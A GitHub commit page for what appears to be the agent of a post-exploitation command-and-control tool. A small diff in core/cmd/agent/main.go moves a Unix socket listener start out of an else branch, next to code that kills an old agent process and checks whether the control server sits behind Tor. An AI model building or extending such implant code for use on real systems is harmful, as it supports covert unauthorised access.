Skip to content

Commit

Permalink
fix: fatal error in unix socket listener
Browse files Browse the repository at this point in the history
  • Loading branch information
jm33-m0 committed Dec 19, 2024
1 parent 76686b1 commit 1cd3065
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions core/cmd/agent/main.go
Original file line number Diff line number Diff line change
Expand Up @@ -255,11 +255,11 @@ test_agent:
log.Println("Failed to kill old emp3r0r", err)
}
}
} else {
// start socket listener
go socketListen()
}

// start socket listener
go socketListen()

// if CC is behind tor, a proxy is needed
if tun.IsTor(emp3r0r_data.CCAddress) {
// if CC is on Tor, CCPort won't be used since Tor handles forwarding
Expand Down

0 comments on commit 1cd3065

Please sign in to comment.